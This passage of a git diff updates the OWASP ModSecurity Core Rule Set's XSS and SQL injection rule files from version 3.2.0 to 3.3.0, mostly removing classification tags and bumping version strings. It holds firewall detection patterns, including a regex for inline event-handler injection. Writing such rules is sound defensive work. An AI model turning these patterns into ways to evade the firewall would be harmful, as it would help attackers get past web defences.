REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\"'`;\/0-9=\x0B\x09\x0C\x3B\x2C\x28\x3B]on[a-zA-Z]+[\s\x0B\x09\x0C\x3B\x2C\x28\x3B]*?=" \ "id:941120,\ phase:2,\ block,\ @@ -110,14 +98,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/XSS',\ - tag:'WASCTC/WASC-8',\ - tag:'WASCTC/WASC-22',\ - tag:'OWASP_TOP_10/A3',\ - tag:'OWASP_AppSensor/IE1',\ - tag:'CAPEC-242',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -145,14 +127,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/XSS',\ - tag:'WASCTC/WASC-8',\ - tag:'WASCTC/WASC-22',\ - tag:'OWASP_TOP_10/A3',\ - tag:'OWASP_AppSensor/IE1',\ - tag:'CAPEC-242',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -176,14 +152,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/XSS',\ - tag:'WASCTC/WASC-8',\ - tag:'WASCTC/WASC-22',\ - tag:'OWASP_TOP_10/A3',\ - tag:'OWASP_AppSensor/IE1',\ - tag:'CAPEC-242',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -216,14 +186,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/XSS',\ - tag:'WASCTC/WASC-8',\ - tag:'WASCTC/WASC-22',\ - tag:'OWASP_TOP_10/A3',\ - tag:'OWASP_AppSensor/IE1',\ - tag:'CAPEC-242',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -246,14 +210,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/XSS',\ - tag:'WASCTC/WASC-8',\ - tag:'WASCTC/WASC-22',\ - tag:'OWASP_TOP_10/A3',\ - tag:'OWASP_AppSensor/IE1',\ - tag:'CAPEC-242',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -277,14 +235,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/XSS',\ - tag:'WASCTC/WASC-8',\ - tag:'WASCTC/WASC-22',\ - tag:'OWASP_TOP_10/A3',\ - tag:'OWASP_AppSensor/IE1',\ - tag:'CAPEC-242',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -309,14 +261,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/XSS',\ - tag:'WASCTC/WASC-8',\ - tag:'WASCTC/WASC-22',\ - tag:'OWASP_TOP_10/A3',\ - tag:'OWASP_AppSensor/IE1',\ - tag:'CAPEC-242',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -336,14 +282,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/XSS',\ - tag:'WASCTC/WASC-8',\ - tag:'WASCTC/WASC-22',\ - tag:'OWASP_TOP_10/A3',\ - tag:'OWASP_AppSensor/IE1',\ - tag:'CAPEC-242',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -363,14 +303,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/XSS',\ - tag:'WASCTC/WASC-8',\ - tag:'WASCTC/WASC-22',\ - tag:'OWASP_TOP_10/A3',\ - tag:'OWASP_AppSensor/IE1',\ - tag:'CAPEC-242',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -390,14 +324,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/XSS',\ - tag:'WASCTC/WASC-8',\ - tag:'WASCTC/WASC-22',\ - tag:'OWASP_TOP_10/A3',\ - tag:'OWASP_AppSensor/IE1',\ - tag:'CAPEC-242',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -417,14 +345,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/XSS',\ - tag:'WASCTC/WASC-8',\ - tag:'WASCTC/WASC-22',\ - tag:'OWASP_TOP_10/A3',\ - tag:'OWASP_AppSensor/IE1',\ - tag:'CAPEC-242',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -444,14 +366,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/XSS',\ - tag:'WASCTC/WASC-8',\ - tag:'WASCTC/WASC-22',\ - tag:'OWASP_TOP_10/A3',\ - tag:'OWASP_AppSensor/IE1',\ - tag:'CAPEC-242',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -471,14 +387,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/XSS',\ - tag:'WASCTC/WASC-8',\ - tag:'WASCTC/WASC-22',\ - tag:'OWASP_TOP_10/A3',\ - tag:'OWASP_AppSensor/IE1',\ - tag:'CAPEC-242',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -498,14 +408,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/XSS',\ - tag:'WASCTC/WASC-8',\ - tag:'WASCTC/WASC-22',\ - tag:'OWASP_TOP_10/A3',\ - tag:'OWASP_AppSensor/IE1',\ - tag:'CAPEC-242',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -525,14 +429,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/XSS',\ - tag:'WASCTC/WASC-8',\ - tag:'WASCTC/WASC-22',\ - tag:'OWASP_TOP_10/A3',\ - tag:'OWASP_AppSensor/IE1',\ - tag:'CAPEC-242',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -552,14 +450,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/XSS',\ - tag:'WASCTC/WASC-8',\ - tag:'WASCTC/WASC-22',\ - tag:'OWASP_TOP_10/A3',\ - tag:'OWASP_AppSensor/IE1',\ - tag:'CAPEC-242',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -579,14 +471,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/XSS',\ - tag:'WASCTC/WASC-8',\ - tag:'WASCTC/WASC-22',\ - tag:'OWASP_TOP_10/A3',\ - tag:'OWASP_AppSensor/IE1',\ - tag:'CAPEC-242',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -606,14 +492,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/XSS',\ - tag:'WASCTC/WASC-8',\ - tag:'WASCTC/WASC-22',\ - tag:'OWASP_TOP_10/A3',\ - tag:'OWASP_AppSensor/IE1',\ - tag:'CAPEC-242',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -638,14 +518,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/XSS',\ - tag:'WASCTC/WASC-8',\ - tag:'WASCTC/WASC-22',\ - tag:'OWASP_TOP_10/A3',\ - tag:'OWASP_AppSensor/IE1',\ - tag:'CAPEC-242',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -670,14 +544,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/XSS',\ - tag:'WASCTC/WASC-8',\ - tag:'WASCTC/WASC-22',\ - tag:'OWASP_TOP_10/A3',\ - tag:'OWASP_AppSensor/IE1',\ - tag:'CAPEC-242',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -717,11 +585,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/XSS',\ - tag:'OWASP_TOP_10/A7',\ - tag:'CAPEC-63',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -747,11 +612,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS|XML: tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/XSS',\ - tag:'OWASP_TOP_10/A7',\ - tag:'CAPEC-63',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -779,15 +641,9 @@ SecRule REQUEST_HEADERS:Referer "@detectXSS" \ tag:'platform-multi',\ tag:'attack-xss',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/XSS',\ - tag:'WASCTC/WASC-8',\ - tag:'WASCTC/WASC-22',\ - tag:'OWASP_TOP_10/A3',\ - tag:'OWASP_AppSensor/IE1',\ - tag:'CAPEC-242',\ tag:'paranoia-level/2',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -810,15 +666,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H tag:'platform-multi',\ tag:'attack-xss',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/XSS',\ - tag:'WASCTC/WASC-8',\ - tag:'WASCTC/WASC-22',\ - tag:'OWASP_TOP_10/A3',\ - tag:'OWASP_AppSensor/IE1',\ - tag:'CAPEC-242',\ tag:'paranoia-level/2',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -898,14 +748,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'platform-multi',\ tag:'attack-xss',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/XSS',\ - tag:'WASCTC/WASC-8',\ - tag:'WASCTC/WASC-22',\ - tag:'OWASP_TOP_10/A2',\ - tag:'OWASP_AppSensor/IE1',\ tag:'PCI/6.5.1',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -923,14 +768,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'platform-multi',\ tag:'attack-xss',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/XSS',\ - tag:'WASCTC/WASC-8',\ - tag:'WASCTC/WASC-22',\ - tag:'OWASP_TOP_10/A2',\ - tag:'OWASP_AppSensor/IE1',\ tag:'PCI/6.5.1',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -951,14 +791,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'platform-multi',\ tag:'attack-xss',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/XSS',\ - tag:'WASCTC/WASC-8',\ - tag:'WASCTC/WASC-22',\ - tag:'OWASP_TOP_10/A2',\ - tag:'OWASP_AppSensor/IE1',\ tag:'PCI/6.5.1',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -988,12 +823,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'language-multi',\ tag:'attack-xss',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/XSS',\ - tag:'OWASP_TOP_10/A7',\ - tag:'CAPEC-63',\ tag:'paranoia-level/2',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" diff --git a/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf b/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf index 504c826ce..5f93a8ce4 100644 --- a/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf +++ b/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -56,12 +56,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H tag:'attack-sqli',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ multiMatch,\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ @@ -93,13 +89,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-sqli',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -124,8 +116,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-sqli',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -152,12 +143,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-sqli',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -184,12 +171,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-sqli',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -208,12 +191,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-sqli',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -232,12 +211,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-sqli',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -264,12 +239,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-sqli',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -288,12 +259,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-sqli',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -312,12 +279,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-sqli',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -344,12 +307,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-sqli',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.2.0',\ + 